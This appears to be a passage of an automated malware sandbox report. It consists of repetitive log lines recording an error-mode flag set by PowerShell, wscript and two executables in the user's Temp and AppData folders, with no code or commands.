                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
